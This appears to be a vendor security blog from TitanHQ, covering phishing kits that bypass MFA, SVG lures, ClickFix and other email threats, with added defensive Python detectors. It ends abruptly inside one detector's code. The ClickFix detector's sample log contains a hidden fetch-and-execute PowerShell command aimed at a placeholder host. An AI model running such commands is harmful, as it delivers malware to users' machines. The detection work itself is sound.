titanadmin
by titanadmin | Feb 18, 2025 | Phishing & Email Spam |
A growing number of businesses are implementing multi-factor authentication to add an extra layer of security and improve defenses against phishing attacks. While multifactor authentication (MFA) can prevent unauthorized individuals from accessing accounts using compromised credentials, MFA does not provide total protection. Several phishing kits are sold on hacking forums and Telegram that are capable of bypassing MFA, and a new phishing kit has recently been identified that can intercept credentials in real-time and bypass MFA through session hijacking. The phishing kit is being used to steal credentials and access Gmail, Yahoo, AOL, and Microsoft 365 accounts.
The Astaroth phishing kit has been offered on cybercrime forums since at least January 2025. Similar to the Evilginx phishing kit, Astaroth uses a reverse proxy to intercept and manipulate traffic between the victim and the legitimate authentication of the account being targeted. A cybercriminal can use the Astaroth phishing kit in an adversary-in-the-middle attack, capturing not only login credentials but also 2FA tokens and session cookies, thereby bypassing MFA. The credential theft and session hijacking take place in real time, allowing the cybercriminal to instantly access the user’s account.
The user is presented with a phishing link, which is commonly communicated via email. If that link is clicked, the user is directed to a server and is presented with what appears to be a legitimate login page. The page has valid SSL certificates, so no security warnings are generated. The server acts as a reverse proxy, and when the username and password are entered, they are captured and forwarded to the legitimate authentication service in real time.
The cybercriminal is alerted about the credential capture via the admin panel of the phishing kit or via Telegram, and the one-time passcodes, usually generated via SMS, push notifications, or authentication apps, are intercepted as they are entered by the user. When session cookies are generated, they are immediately hijacked and injected into the attacker’s browser, which means the attacker can impersonate the genuine user without needing their username, password, or 2FA token, since the session has already been authenticated. The kit also includes bulletproof hosting and reCAPTCHA bypasses and allows the attacker to access the account immediately before the user suspects anything untoward has happened.
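The session hijacking described above leaves one trace a defender can look for: the same session cookie presented by two different clients shortly after sign-in. The following detection sketch is an added example, not code from the original article; the event layout, the 10-minute window and all sample values are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample events, not taken from any real log. Each tuple is
# (timestamp, user, session id, source IP, user agent); the field layout is an
# assumption for this example.
SAMPLE_EVENTS = [
    ("2025-02-18T07:00:00", "dave@example.com", "sess-d4", "192.0.2.40", "Chrome/132 Windows"),
    ("2025-02-18T08:00:00", "carol@example.com", "sess-c3", "192.0.2.30", "Safari/18 macOS"),
    ("2025-02-18T08:04:00", "carol@example.com", "sess-c3", "192.0.2.31", "Safari/18 macOS"),
    ("2025-02-18T09:00:05", "alice@example.com", "sess-a1", "198.51.100.7", "Chrome/132 Windows"),
    ("2025-02-18T09:00:40", "alice@example.com", "sess-a1", "203.0.113.99", "Firefox/134 Linux"),
    ("2025-02-18T09:10:00", "bob@example.com", "sess-b2", "192.0.2.20", "Edge/132 Windows"),
    ("2025-02-18T09:12:00", "bob@example.com", "sess-b2", "192.0.2.20", "Edge/132 Windows"),
    ("2025-02-18T11:00:00", "dave@example.com", "sess-d4", "192.0.2.77", "Firefox/134 Linux"),
]

# A cookie replayed in real time shows up from a second client within minutes.
# Address changes hours later are common for roaming users, so they are ignored.
REUSE_WINDOW = timedelta(minutes=10)


def find_session_reuse(events, window=REUSE_WINDOW):
    """Flag sessions presented from a second source IP soon after first use.

    Severity is "high" when the user agent changed as well (a different
    browser is replaying the cookie) and "medium" when only the IP changed.
    """
    issued = {}       # session id -> (time, ip, user agent) of first use
    reported = set()  # (session id, ip, user agent) combinations already flagged
    findings = []
    ordered = sorted(events, key=lambda e: datetime.fromisoformat(e[0]))
    for ts, user, sid, ip, agent in ordered:
        when = datetime.fromisoformat(ts)
        if sid not in issued:
            issued[sid] = (when, ip, agent)
            continue
        t0, ip0, agent0 = issued[sid]
        if ip == ip0 or when - t0 > window or (sid, ip, agent) in reported:
            continue
        reported.add((sid, ip, agent))
        findings.append({
            "user": user,
            "session": sid,
            "first_ip": ip0,
            "second_ip": ip,
            "seconds_after_login": int((when - t0).total_seconds()),
            "severity": "high" if agent != agent0 else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in find_session_reuse(SAMPLE_EVENTS):
        print(finding)
```

A finding is a reason to revoke the session and force re-authentication, since changing the password alone does not invalidate a cookie that has already been issued.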
Phishing kits such as Astaroth are able to render multifactor authentication useless, demonstrating why it is so important to have effective anti-spam software, capable of identifying and blocking the initial phishing emails. SpamTitan is frequently rated as the best spam filter for business due to its ease of implementation and use, exceptional detection, and low false positive rate. TitanHQ also offers MSP spam filtering, with the solution developed from the ground up to meet all MSP needs. In recent independent tests by VirusBulletin, SpamTitan outperformed all other tested email security solutions, achieving the highest overall score thanks to a 100% malware catch rate, 100% phishing catch rate, 99.999% spam catch rate, and a 0.000% false positive rate. The exceptional performance is due to extensive threat intelligence feeds, machine learning to identify phishing attempts, and email sandboxing to detect and block malware and zero-day threats.
In addition to an advanced spam filtering service, businesses should ensure they provide regular security awareness training to the workforce and reinforce training with phishing simulations. SafeTitan from TitanHQ is an easy-to-use security awareness training platform that makes it easy to create effective training courses and automate the delivery of training content. The platform also includes a phishing simulator with an extensive library of phishing templates that makes it easy to create and automate phishing simulations, generating relevant training automatically if a user is tricked. That means training is delivered at the point when it is likely to be most effective at correcting behavior.
Give the TitanHQ team a call today for more information about these solutions. TitanHQ’s SpamTitan and SafeTitan products, like all TitanHQ solutions, are also available on a free trial.
by titanadmin | Feb 14, 2025 | Phishing & Email Spam |
Security awareness training programs teach employees to be constantly alert to potential phishing emails, especially emails with file attachments. Most employees will be aware that Office documents can contain macros, which if allowed to run, can download malware onto their device, but they are likely much less suspicious about image files. Image files are far less likely to be malicious; however, there is an image file format that can contain malicious content – SVG files – and they are increasingly being used in phishing campaigns.
An SVG (Scalable Vector Graphics) file is an XML-based vector image, which means it can be scaled without loss of quality. These file types are commonly used for icons and buttons and are extensively used in graphic design, including for company logos. Image files may seem pretty innocuous, but one of the properties of SVG files, unlike non-scalable image formats such as JPEGs, is that they can be created to include scripts, anchor tags, and other types of active web content. When opening an SVG file, unless a computer has been configured to open the file using a specific image program, the file will be opened in a web browser.
One campaign incorporated the SharePoint logo and advised the user that a secure document has been shared through Microsoft SharePoint. The image included a folder icon with the file name “Updated Compensation and Benefits”, and an “open” button that the user is encouraged to click. Clicking that button directs the user to a phishing page where they must enter their credentials to view the file. Those credentials will be captured and used to access the user’s account. Many phishing campaigns that use SVG file attachments include hyperlinks that direct the user to a site that spoofs a well-known brand such as Microsoft to harvest credentials, such as displaying a fake Microsoft 365 login page. These phishing pages have been designed to be indistinguishable from the genuine login prompt and may even autofill the user’s login name into the login prompt.
There are two main advantages to using SVG files in phishing campaigns. First and foremost, the file is less likely to be flagged as malicious by an email security solution, many of which do not analyze the content of SVG files, therefore ensuring messages containing SVG files are delivered to an end user’s inbox. Secondly, since awareness of malicious SVG files is low, the targeted individuals may be easily tricked into clicking on the hyperlink. The use of SVG files in phishing campaigns is becoming more common, and this trend is likely to continue in 2025. Businesses should ensure that they have adequate defenses to block these attacks, which should consist of advanced anti-spam software to block these phishing emails, and security awareness training content should be updated to raise awareness of this attack technique.
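Because the risk comes from active content inside the XML, an attachment filter can parse an SVG and report scripts, event handlers, embedded HTML and outbound links before the file reaches an inbox. The scanner below is an added example, not code from the original article or from any TitanHQ product; the finding labels and the sample files (including the placeholder host name) are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed sample modelled on the lure described above: a clickable "Open"
# button wrapped in an anchor. The host name is a placeholder.
LURE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="400" height="200">
  <text x="20" y="40">A secure document has been shared with you</text>
  <a xlink:href="https://files.example.invalid/view?id=1">
    <rect x="20" y="80" width="120" height="40" onclick="void(0)"/>
    <text x="50" y="105">Open</text>
  </a>
</svg>"""

# Constructed sample of an ordinary static icon.
CLEAN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <path d="M1 1 L9 9" stroke="black"/>
</svg>"""


def _local(name):
    """Strip the '{namespace}' prefix ElementTree adds and lower-case the name."""
    return name.rsplit("}", 1)[-1].lower()


def scan_svg(data):
    """Return a list of findings for active content in an SVG (bytes).

    An empty list means no active content was found. Files that declare XML
    entities are reported without being parsed, so a hostile file cannot use
    entity expansion against the scanner itself.
    """
    if b"<!entity" in data.lower():
        return ["entity-declaration"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["malformed-xml"]

    findings = []
    for element in root.iter():
        tag = _local(element.tag)
        if tag == "script":
            findings.append("script-element")
        elif tag == "foreignobject":
            # foreignObject lets an SVG embed arbitrary HTML such as forms.
            findings.append("foreignobject-html")
        for attr, value in element.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                findings.append("event-handler:" + name)
            elif name == "href":  # covers both href and xlink:href
                try:
                    url = urlparse(value.strip())
                except ValueError:
                    findings.append("unparseable-href")
                    continue
                scheme = url.scheme.lower()
                # data: URIs on <image> are normal embedded bitmaps.
                if scheme == "javascript" or (scheme == "data" and tag != "image"):
                    findings.append("active-href:" + scheme)
                elif scheme in ("http", "https"):
                    findings.append("external-link:" + (url.hostname or "?"))
    return findings


if __name__ == "__main__":
    print("lure :", scan_svg(LURE_SVG))
    print("clean:", scan_svg(CLEAN_SVG))
```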
SpamTitan is an advanced spam filtering service from TitanHQ that has been proven to block more phishing emails than other email security solutions. SpamTitan was recently put to the test by VirusBulletin and outperformed all other tested anti-spam software solutions, blocking 100% of malware, 100% of phishing emails, and 99.999% of spam emails, with a 0.000% false positive rate. Machine learning algorithms ensure that the solution gets better over time, extensive threat intelligence feeds keep the solution automatically updated with up-to-the-minute threat intelligence, and a next-generation email sandbox provides exceptional protection against malware. When coupled with the SafeTitan security awareness training and phishing simulations to improve employee awareness, businesses will be well protected against phishing, malware, and other email-based attacks. Give the TitanHQ team a call today for more information about these solutions or take advantage of a free trial and see for yourself the difference these solutions make to your security posture.
by titanadmin | Feb 3, 2025 | Phishing & Email Spam, Security Awareness, Spam Software |
Investigations of cyberattacks have identified an increasing number of incidents that started with email bombing. A high percentage of cyberattacks involve phishing, where emails are sent to employees to trick them into visiting a malicious website and disclosing their credentials, or opening a malicious file that installs malware. Email bombing is now being used to increase the effectiveness of phishing campaigns.
With email bombing, the user is sent a large number of spam emails in a short period of time, such as by adding a user to a large number of mailshots, news services, and spam lists. The threat actor creates a genuine spam issue then impersonates a member of the IT department and claims they can fix the problem, with contact often made via a Microsoft Teams message. If the user accepts, they are tricked into installing remote access software and granting the threat actor remote access to their device. The threat actor will establish persistent access to the user’s device during the remote access session. What starts with an email bombing attack often ends with a ransomware attack.
There are several measures that you should consider implementing to prevent these attacks. If you use Microsoft Teams, consider restricting calls and messages from external organizations, unless there is a legitimate need to accept such requests. If so, ensure permission is only given to trusted individuals such as business partners. The use of remote access tools should be restricted to authorized personnel only, and steps should be taken to prevent the installation of these tools, including using a web filter to block downloads of these tools (and other executables) from the Internet.
A spam filter should be implemented to block spam and unwanted messages. Advanced spam filters such as SpamTitan use AI-guided detection and machine learning to block spam, phishing, and other malicious emails, along with email sandboxing to identify novel threats and zero-day malware. In the Q4, 2024, tests at VirusBulletin, the SpamTitan spam filtering service blocked 99.999% of spam emails, 100% of phishing emails, and 100% of malware with a 0.000% false positive rate, earning SpamTitan top position out of all anti-spam software under test.
Businesses should not underestimate the importance of security awareness training and phishing simulations. Regular security awareness training should be provided to all members of the workforce to raise awareness of the tactics used by cybercriminals. A cyberattack is much more likely to occur as a result of a phishing or social engineering attempt than the exploitation of a software vulnerability. Businesses that use the SafeTitan security awareness training platform and phishing simulator have reduced susceptibility to email attacks by up to 80%. For more information on TitanHQ cybersecurity solutions, including award-winning anti-spam solutions for managed service providers, give the TitanHQ team a call or take advantage of a free trial of any of TitanHQ’s cybersecurity solutions.
by titanadmin | Jan 31, 2025 | Phishing & Email Spam, Security Awareness, Spam News |
As the massive cyberattack on Change Healthcare demonstrated last year, the failure to implement multifactor authentication on accounts can be costly. In that attack, multifactor authentication was not implemented on a Citrix server, and stolen credentials allowed access that resulted in the theft of the personal and health information of 190 million individuals. The ransomware attack caused a prolonged outage, and remediation and recovery cost Change Healthcare an estimated $2.9 billion last year.
The attack should serve as a warning for all companies that multifactor authentication is an essential cybersecurity measure – if passwords are compromised, access to accounts can be prevented. Unfortunately, multifactor authentication protection can be circumvented. Threat actors are increasingly using phishing kits capable of intercepting multifactor authentication codes in an adversary-in-the-middle attack. Phishing kits are packages offered to cybercriminals that cover all aspects of phishing. If purchased, phishing campaigns can be conducted with minimal effort as the phishing kit will generate copies of websites that impersonate well-known brands, the infrastructure for capturing credentials, and templates for phishing emails. After paying a fee, all that is required is to supply the email addresses for the campaign, which can be easily purchased on hacking forums.
Some of the more advanced phishing kits are capable of defeating multifactor authentication by harvesting Microsoft 365 and Gmail session cookies, which are used to circumvent MFA access controls during subsequent authentication. One of the latest phishing kits to be identified has been dubbed Sneaky 2FA. The kit was first identified as being offered and operated on Telegram in October 2024 by researchers at the French cybersecurity firm Sekoia. The researchers identified almost 100 domains that host phishing pages created by the Sneaky 2FA phishing kit.
As with a standard phishing attack, phishing emails are sent to individuals to trick them into visiting a phishing page. One campaign using the Sneaky 2FA phishing kit uses payment receipt-related emails to trick the recipient into opening a PDF file attachment that has a QR code directing the user to a Sneaky 2FA page on a compromised website, usually a compromised WordPress site. These pages have a blurred background and a login prompt. Microsoft 365 credentials are required to access the blurred content. The phishing pages automatically add the user’s email address to the login prompt, so they are only required to enter their password. To evade detection, multiple measures are employed such as traffic filtering, Cloudflare Turnstile challenges, and CAPTCHA checks.
Many phishing kits use reverse proxies for handling requests; however, the Sneaky 2FA phishing server handles communications with the Microsoft 365 API directly. If the checks are passed, JavaScript code is used to handle the authentication steps. When the password is entered, the user is directed to the next page, and the victim’s email address and password are sent to the phishing server via an HTTP POST. The server responds with the 2FA method for the victim’s account and the response is sent to the phishing server. The phishing kit allows session cookies to be harvested that provide account access, regardless of the 2FA method – Microsoft Authenticator, one-time password code, or SMS verification.
Phishing kits such as Sneaky 2FA make it easy for cybercriminals to conduct phishing attacks and defeat MFA; however, they are not effective at defeating phishing-resistant MFA such as FIDO2, WebAuthn, or biometric authentication. The problem is that these forms of MFA can be expensive and difficult to deploy at scale.
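WebAuthn resists these kits because the browser records the origin the user is actually on, and the authenticator hashes the relying party ID, inside the signed response, so a login performed on a look-alike domain fails the server's checks. The sketch below is an added example, not code from the original article; it shows those binding checks on constructed data, assumes the assertion signature has already been verified against the registered public key, and uses placeholder domain names.

```python
import base64
import hashlib
import hmac
import json


def b64url(data):
    """Base64url without padding, the encoding WebAuthn uses for challenges."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def check_assertion_binding(client_data_json, authenticator_data, *,
                            expected_origin, rp_id, expected_challenge):
    """Return the list of failed binding checks; an empty list means all passed.

    client_data_json   -- raw clientDataJSON bytes produced by the browser
    authenticator_data -- raw authenticator data bytes
    """
    try:
        client = json.loads(client_data_json)
    except ValueError:
        return ["client-data-not-json"]
    if not isinstance(client, dict):
        return ["client-data-not-json"]

    failures = []
    if client.get("type") != "webauthn.get":
        failures.append("wrong-type")
    # The challenge must be the one this server issued for this login attempt.
    sent = str(client.get("challenge", "")).encode("utf-8")
    if not hmac.compare_digest(sent, b64url(expected_challenge).encode("ascii")):
        failures.append("challenge-mismatch")
    # The browser, not the page, fills in the origin the user is really on.
    if client.get("origin") != expected_origin:
        failures.append("origin-mismatch")

    # Authenticator data: 32-byte SHA-256 of the RP ID, 1 flag byte, 4-byte counter.
    if len(authenticator_data) < 37:
        return failures + ["authenticator-data-too-short"]
    rp_hash = hashlib.sha256(rp_id.encode("utf-8")).digest()
    if not hmac.compare_digest(authenticator_data[:32], rp_hash):
        failures.append("rp-id-hash-mismatch")
    if not authenticator_data[32] & 0x01:  # bit 0 = user present
        failures.append("user-not-present")
    return failures


def build_assertion(origin, rp_id, challenge, flags=0x05, sign_count=1):
    """Construct sample clientDataJSON and authenticator data for the demo."""
    client_data = json.dumps({
        "type": "webauthn.get",
        "challenge": b64url(challenge),
        "origin": origin,
    }).encode("utf-8")
    auth_data = (hashlib.sha256(rp_id.encode("utf-8")).digest()
                 + bytes([flags]) + sign_count.to_bytes(4, "big"))
    return client_data, auth_data


if __name__ == "__main__":
    challenge = b"\x01" * 32  # constructed; a real server uses random bytes
    expected = dict(expected_origin="https://login.example.com",
                    rp_id="example.com", expected_challenge=challenge)
    # Genuine sign-in on the real site.
    print(check_assertion_binding(
        *build_assertion("https://login.example.com", "example.com", challenge),
        **expected))
    # Sign-in attempted on a look-alike domain and relayed to the real site.
    print(check_assertion_binding(
        *build_assertion("https://login.example-sso.invalid", "example-sso.invalid", challenge),
        **expected))
```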
Businesses can greatly improve their defenses with advanced spam filter software with AI- and machine learning detection, email sandboxing, URL rewriting, QR code checks, greylisting, SPF, DKIM, and DMARC checks, and banners identifying emails from external sources. Effective email filtering will ensure that these malicious emails do not land in employee inboxes. TitanHQ offers two email security solutions – SpamTitan email security and the PhishTitan anti-phishing solution for M365. The engine that powers both solutions was recently rated in 1st place for protection in the Q4, 2024 tests by VirusBulletin, achieving a 100% malware and 100% phishing detection rate.
Regular security awareness training should also be provided to all members of the workforce to raise awareness of threats and to teach cybersecurity best practices. With the SafeTitan security awareness training platform it is easy to create and automate training courses and add in new training content when new threat actor tactics are identified. The platform also includes a phishing simulator for reinforcing training and identifying individuals in need of additional training.
For more information on improving your defenses against phishing and malware, give the TitanHQ team a call. Product demonstrations can be arranged on request and all TitanHQ solutions are available on a free trial.
by titanadmin | Jan 28, 2025 | Phishing & Email Spam, Security Awareness, Spam Software, Website Filtering |
A new malware variant called PLAYFULGHOST has been discovered that is being distributed via phishing emails and websites that appear high in search engine listings through black hat search engine optimization (SEO) tactics.
PLAYFULGHOST was analyzed by Google’s Mandiant Managed Defense team, which confirmed the malware had extensive information-stealing capabilities. They include keylogging, taking screenshots, recording audio, copying information from the clipboard, stealing QQ account information, and collecting information on the installed security solutions and system metadata. The malware can also block mouse and keyboard inputs, clear Windows event logs, delete caches and profiles from web browsers, erase profiles and delete local storage for messaging apps, and the malware has file transfer capabilities and can download additional payloads. The malware achieves persistence in four ways – registry keys, scheduled tasks, establishing itself in a Windows service, and through entries in the Windows Startup folder. In short, PLAYFULGHOST is a highly capable and very dangerous new malware variant.
An analysis of the distribution methods identified SEO poisoning, where websites are promoted so they appear high in the search engine listings for search terms related to Virtual Private Network solutions, including the legitimate LetsVPN solution. If a user visits the webpage, they can download the LetsVPN installer; however, it has been trojanized to silently load PLAYFULGHOST in the memory via an interim payload. Phishing is also used to distribute the malware. While multiple lures could be used in this campaign, intercepted emails had code-of-conduct-related lures to trick the recipient into opening a malicious RAR archive that includes a Windows executable file that downloads and executes the malware from a remote server.
If infected with the malware, detection can be problematic since the malware runs in the memory, and multiple persistence mechanisms can make malware removal challenging. It is vital that infection is prevented and that requires multiple measures since the malware is distributed in different ways. To protect against malware delivery via SEO poisoning and malvertising, businesses should use a web filter and provide regular security awareness training to the workforce. The WebTitan DNS filter is a web filtering solution that protects against web-delivered malware in a variety of ways. WebTitan is fed extensive up-to-the-minute threat intelligence on malicious websites and domains and will prevent users (on and off the network) from visiting those malicious websites. That includes visits to websites through web browsing and redirects through malvertising.
WebTitan can be configured to block certain downloads from the Internet by file extension, such as installers and other executable files. In addition to preventing malware delivery, this feature can be used to control shadow IT – software installations that have not been authorized by the IT department. WebTitan can also be used to control the web content that employees can access, by blocking access to web content that serves no work purpose along with risky categories of websites.
Security awareness training is vital for making employees aware of the risks of malware downloads from the Internet. Employees should be instructed not to download software from unofficial websites, warned of the risks of malvertising, and told not to trust a website simply because it is positioned high in the search engine listings. Employees should also be warned of the risk of phishing, be taught how to identify a phishing attempt, and be conditioned to report suspicious emails to their security team. A phishing simulator should also be used to reinforce training and identify individuals who are susceptible to phishing so they can be provided with additional training. TitanHQ’s SafeTitan security awareness training and phishing simulation platform makes this as easy as possible, automating the delivery of training and phishing simulation exercises.
TitanHQ offers two powerful anti-phishing solutions – PhishTitan for Microsoft 365 users and SpamTitan anti-spam software. Both are powered by the same advanced engine that was recently assessed by VirusBulletin, and confirmed to block 100% of malware, 100% of phishing emails, and 99.999% of spam emails in Q4 tests. The incredibly strong performance earned TitanHQ top spot out of all the leading solutions under test. The strong anti-malware performance was due to twin (signature-based) antivirus engines and cutting-edge behavioral protection with email sandboxing.
With new, stealthy malware variants constantly being released, and cybercriminals developing highly sophisticated AI-based phishing campaigns, businesses need to ensure they have cybersecurity solutions capable of identifying and blocking the threats. With TitanHQ as your cybersecurity partner, you will be well protected against ever-evolving cyber threats. Give the TitanHQ team a call today for further information on bolstering your malware and phishing defenses or put these solutions to the test in a free trial.
by titanadmin | Jan 28, 2025 | Phishing & Email Spam |
In the United States, tax returns for the previous year need to be filed before Tax Day, which falls on Tuesday, April 15, 2025. Tax season officially started on January 27, 2025, when the Internal Revenue Service (IRS) started accepting tax returns for 2024. Tax season is a popular time for cybercriminals who take advantage of individuals and businesses that are under pressure to file their annual tax returns and try to steal personal information to file fraudulent tax returns in victims’ names and for other nefarious purposes.
Cybercriminals use tried and tested methods for their scams, but over the past few years, the scams have become more sophisticated. There has been a significant increase in the use of AI tools to craft highly convincing phishing emails. Phishing is one of the most common ways that cybercriminals trick people into disclosing sensitive information during tax season. One of the most common phishing techniques in tax season involves impersonation of the IRS. Emails are sent that appear to have come from an official IRS domain, the contact information in the email may be 100% correct, and the emails contain the IRS logo. The lures used in these scams include fake offers of tax refunds with rapid payment, legal threats, and criminal charges for tax fraud. These scams tempt or scare people into visiting a website linked in the email or calling a telephone number provided in the email.
The website to which the user is directed mimics the official IRS site and social engineering techniques are used to get the user to disclose sensitive information. That information is rapidly used to file a fraudulent tax return, with the victim only discovering they have been scammed when they file their tax return and are notified by the IRS that it is a duplicate. Alternatively, they are told that they must pay outstanding tax immediately and are threatened with fines and criminal charges if they fail to do so. Scams promising a tax return require personal information and bank account details to be disclosed.
Businesses are targeted in a variety of tax season scams, with one of the most common being fake tax services. Filing tax returns can be a time-consuming and arduous process, so tax filing services that do all of the work are an attractive choice. Businesses may be contacted via email, telephone, or could be directed to these scam services via the Internet. Businesses are tricked into providing personal and financial information, which could be used to file a fraudulent tax return. Commonly, the aim is to trick the business into downloading malware onto their device. These services may lure victims by promising quick tax refunds, which can be attractive for cash-strapped businesses.
According to the IRS, last year taxpayers lost $5.5 billion to tax scams and fraud so vigilance is key during tax season. Be aware that cybercriminals are incredibly active during tax season, and any offer that seems too good to be true most likely is. The IRS will not initiate contact via email or text message, as initial contact is typically made via the U.S. Postal Service, and emails and text messages are only sent if the IRS has been given permission to do so. The IRS will not make contact via social media, does not accept gift cards as payment, does not use robocalls, and does not threaten to call law enforcement or immigration officials.
Businesses should ensure they have anti-spam software to catch and neutralize phishing threats; however, not all spam filtering services are equal. Spam filters will perform a range of checks on inbound email, including reputation checks of the sender’s domain and email address, anti-spoofing checks, checks of blacklists of malicious IP addresses, and the email content will be assessed for malicious links, common signatures of phishing, and email attachments will be checked using anti-virus software. While these methods will identify the vast majority of spam emails and many phishing attempts, these checks are no longer sufficient.
The best spam filter for business is an advanced solution that has AI and machine learning capabilities for detecting advanced phishing scams and AI-generated threats. To catch and block AI-generated threats you need AI in your defenses. SpamTitan is an advanced cloud-based anti-spam service from TitanHQ (an anti-spam gateway is also available) that performs all of the standard checks mentioned above, scans emails with twin anti-virus engines, and uses machine-learning-based detection to identify the threats that many other spam filtering software solutions miss. If initial checks are passed, emails are sent to an email sandbox for deep analysis. With email sandboxing, attachments are assessed in a safe environment and their behavior is analyzed in depth, allowing novel malware to be identified and links are followed and assessed for malicious content.
SpamTitan consistently outperforms other leading email security solutions and, in the latest round of independent tests at VirusBulletin, SpamTitan was ranked in first place due to unbeatable detection rates, having blocked 100% of malware, 100% of phishing emails, and 99.999% of spam emails, with a 0.000% false positive rate. This tax season, ensure you have the best email protection for your business by using SpamTitan. Call TitanHQ for more information, to arrange a product demonstration, or sign up for a free trial to see for yourself how effective SpamTitan is at blocking email threats.
by titanadmin | Jan 26, 2025 | Phishing & Email Spam |
Cybercriminals often devise phishing lures that can be used on as many individuals as possible, which is why they often impersonate big-name brands such as Microsoft, Apple, Facebook, and Google, since there is a high percentage chance that the emails will land in the inbox of someone that uses the products of those companies.
In the case of Google, a phishing campaign targeting Gmail account holders makes sense from the perspective of a cybercriminal as there are around 2.5 billion Gmail users worldwide. One such campaign has recently been identified that uses a combination of an email and a phone call to obtain account credentials. Email accounts can contain a wealth of sensitive information that can be misused or used in further attacks on an individual, and the accounts can be used for phishing and spear phishing campaigns.
Phishing campaigns that combine multiple communication methods are becoming more common, such as callback phishing. With callback phishing, the scam starts with an email devoid of malicious links, scripts, and attachments. The recipient is told that a charge will be applied to their account for a subscription or free trial that is coming to an end. The user is informed that they must call the number in the email to terminate the subscription before the charge is applied. If the number is called, the threat actor uses social engineering techniques to trick the user into downloading a remote access solution to remove the software and prevent the charge. The software gives the threat actor full control of their device.
The latest campaign uses emails and phone calls in the opposite order, with initial contact made via the phone by a person impersonating the Google support team. The reason for the phone call is to advise the Gmail user that their account has been compromised or suspended due to suspicious activity, or that attempts are being made to recover access.
One user received a call where a Google customer support worker told them that a family member was trying to gain access to their account and had provided a death certificate. The call was to verify the validity of the family member’s claim. People targeted in this campaign may attempt to verify the validity of the call by checking the phone number; however, Caller ID is spoofed to make it appear that the call has come from a legitimate Google customer support number.
The second phase of the scam includes an email sent to the user’s Gmail account corroborating the matter discussed in the phone call, with the email requiring action to recover the account and reset the password. A link is provided that directs the user to a spoofed login page where they are required to enter their credentials, which are captured by the scammer. There have also been reports where initial contact is made via email, with a follow-up telephone call.
Performing such a scam at scale would require a great deal of manpower, and while telephone scams are commonly conducted by call center staff in foreign countries, this scam involves AI-generated calls. The caller sounds professional and polite and has a native accent, but the victim is not conversing with a real person. The reason for the call is plausible, the voice very realistic, and the scam is capable of fooling even security-conscious individuals.
Businesses looking to improve their defenses against advanced phishing scams should ensure that they cover these types of sophisticated phishing attempts in their security awareness training programs. Employees should be told that threat actors may use a variety of methods for contact, often combining more than one communication method in the same scam. Keeping employees up to date on the latest tactics used by scammers is straightforward with the SafeTitan security awareness training platform. New training content can easily be created in response to changing tactics to keep the workforce up to date on the latest scams. SafeTitan also includes a phishing simulator for reinforcing training.
An advanced email security solution is also strongly recommended for blocking the email-based component of these sophisticated phishing scams. SpamTitan cloud-based anti-spam software incorporates machine learning capable of identifying previously unseen phishing scams, ensuring phishing attempts are blocked and do not land in inboxes. In recent independent tests at VirusBulletin, SpamTitan achieved the top spot due to comprehensive detection rates, blocking 100% of malware and phishing emails, and 99.999% of spam emails. To block sophisticated AI-generated phishing attempts you need sophisticated AI-based defenses. Give the TitanHQ team a call today to find out more about improving your defenses against AI-based attacks.
by titanadmin | Jan 26, 2025 | Internet Security, Phishing & Email Spam, Spam Software |
Cybercriminals are increasingly using a social engineering technique dubbed ClickFix to gain persistent access to victims’ networks. ClickFix attacks trick the victim into installing malware themselves. The attacks were first identified in early 2024, and the use of this tactic has been increasing. These attacks take advantage of users’ desire to quickly resolve IT issues without having to inform their IT department. Resolving issues can take time, and usually involves raising a support ticket with the IT department. In ClickFix attacks, the threat actor warns the user about a fake IT issue, often providing some evidence of that issue, and offers a quick and easy solution.
The aim of these attacks is to trick the user into running a PowerShell command, which will ultimately deliver malware to their device. Campaigns have been conducted by threat actors distributing the Lumma information stealer, the Danabot banking trojan/information stealer, the AsyncRAT remote access trojan, and the DarkGate loader, although any number of malware variants could be delivered using this technique. Multiple threat groups have been observed using this technique.
The methods used to get the user to run the malicious PowerShell command are varied, with the deception occurring via email, the Internet, or a combination of the two. Threat actors have been observed conducting phishing ClickFix attacks involving emails with HTML attachments disguised as Microsoft Word documents. The attachments display a fake error message, the resolution of which requires copying and executing a malicious PowerShell command.
Malicious links have been distributed in phishing emails that direct users to sites impersonating software solutions such as Google Meet and PDFSimpli, the Chrome web browser, social media platforms such as Facebook, and transport and logistics companies. Threat actors also use stolen credentials to compromise websites where they create pop-ups, which appear when visitors land on the site warning them about a fictitious security issue. Fake CAPTCHA prompts are often used, where the user is told they must verify that they are human before being allowed to proceed. As part of the verification process, a command is copied to the clipboard, and the user is told to press the Windows key + R, then CTRL + V, and then enter, thus executing the script and triggering a malware download. Security researchers have identified multiple threat actors using this technique, including Russian espionage actors in targeted attacks on Ukrainian companies and many different financially motivated cybercriminal groups.
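The Run-dialog sequence described above leaves a recognizable process trail, because a command pasted into Windows key + R starts with explorer.exe as its parent. The following Python script is an added example, not part of the original article or of any TitanHQ product, that flags this pattern in process-creation events; the sample events, the indicator patterns, and the agent path are constructed assumptions, with field names following Sysmon Event ID 1.

```python
import json
import re

# Constructed sample events (not real telemetry), one JSON object per line.
# Field names follow Sysmon Event ID 1 (process creation).
SAMPLE_LOG = r"""
{"UtcTime": "2025-01-26 09:14:02", "User": "CORP\\alice", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -w hidden -c 'iwr https://example.invalid/placeholder | iex'"}
{"UtcTime": "2025-01-26 09:20:41", "User": "CORP\\bob", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe"}
{"UtcTime": "2025-01-26 09:31:10", "User": "NT AUTHORITY\\SYSTEM", "ParentImage": "C:\\Program Files\\ExampleAgent\\agent.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -NoProfile -EncodedCommand QQBCAEMARABFAEYARwBIAEkASgA="}
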